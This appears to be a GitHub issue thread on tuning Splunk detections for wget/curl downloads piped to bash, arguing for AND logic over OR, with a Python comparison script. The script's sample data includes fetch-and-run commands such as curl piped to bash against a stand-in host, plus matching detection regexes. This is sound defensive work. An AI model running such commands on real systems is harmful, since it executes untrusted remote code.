
Wget/Curl Download and Bash Execution: Changing logic for search terms, to make searches comply with title and intention

Open DipsyTipsy opened this issue 10 months ago • 1 comment

Details

The logic in the queries here has an OR between the matching on quiet/stdout and the match for pipe and "bash". This causes the query to hit when wget/curl is either silenced or piped to bash. From the title I would maybe assume that an AND between the quiet/stdout check and pipe+bash check would be the correct queries?

Searches modified:

  • Wget Download and Bash Execution
  • Curl Download and Bash Execution

Checklist

  • [ ] Validate name matches <platform>_<mitre att&ck technique>_<short description> nomenclature
  • [ ] CI/CD jobs passed ✔️
  • [ ] Validated SPL logic.
  • [ ] Validated tags, description, and how to implement.
  • [ ] Verified references match analytic.

DipsyTipsy avatar Apr 10 '24 11:04 DipsyTipsy
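To make the OR-versus-AND difference concrete, here is an added Python illustration (not the project's SPL, and the regexes are assumptions standing in for the detection's actual field matches) that runs both variants over constructed command lines and lists which ones only the OR form flags:

```python
import re

# Constructed sample command lines, standing in for the process field a
# Splunk endpoint search would inspect. None are real telemetry.
SAMPLE_COMMANDS = [
    "curl -s https://example.test/install.sh | bash",     # silent AND piped to bash
    "wget -q https://example.test/pkg.tar.gz",            # silent download, no shell
    "curl -o /tmp/out.bin https://example.test/out.bin",  # neither silent nor piped
    "wget https://example.test/setup.sh | bash",          # piped to bash, not silent
    "curl -sS https://example.test/api -o /dev/stdout",   # stdout target, no shell
    "echo hello | bash",                                  # no downloader at all
]

# Assumed patterns approximating the three conditions the issue describes.
DOWNLOADER = re.compile(r"\b(?:wget|curl)\b")
QUIET_OR_STDOUT = re.compile(r"(?:\s--?(?:q|s|sS|silent|quiet)\b|/dev/stdout)")
PIPE_TO_BASH = re.compile(r"\|\s*(?:ba)?sh\b")


def matches_or_logic(cmd: str) -> bool:
    """Behaviour the issue reports: downloader AND (quiet/stdout OR pipe-to-bash)."""
    return bool(DOWNLOADER.search(cmd)) and (
        bool(QUIET_OR_STDOUT.search(cmd)) or bool(PIPE_TO_BASH.search(cmd))
    )


def matches_and_logic(cmd: str) -> bool:
    """Behaviour the issue proposes: downloader AND quiet/stdout AND pipe-to-bash."""
    return (
        bool(DOWNLOADER.search(cmd))
        and bool(QUIET_OR_STDOUT.search(cmd))
        and bool(PIPE_TO_BASH.search(cmd))
    )


def compare_logic(commands):
    """Return what each variant flags plus the commands only the OR form hits."""
    or_hits = [c for c in commands if matches_or_logic(c)]
    and_hits = [c for c in commands if matches_and_logic(c)]
    only_or = [c for c in or_hits if c not in and_hits]
    return {"or": or_hits, "and": and_hits, "only_or": only_or}


if __name__ == "__main__":
    for label, hits in compare_logic(SAMPLE_COMMANDS).items():
        print(f"{label}: {len(hits)} hit(s)")
        for cmd in hits:
            print("   ", cmd)
```

The `only_or` list is the set of silent-but-not-executed (or executed-but-not-silent) downloads that the current OR logic alerts on and the proposed AND logic would not.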

Hey @DipsyTipsy , we are working to fix this up. I agree with your fixes. We're in the midst of ensuring we can generate new data that we can test against. We appreciate the feedback and apologize for the long delay in getting this resolved.

MHaggis avatar Aug 27 '24 16:08 MHaggis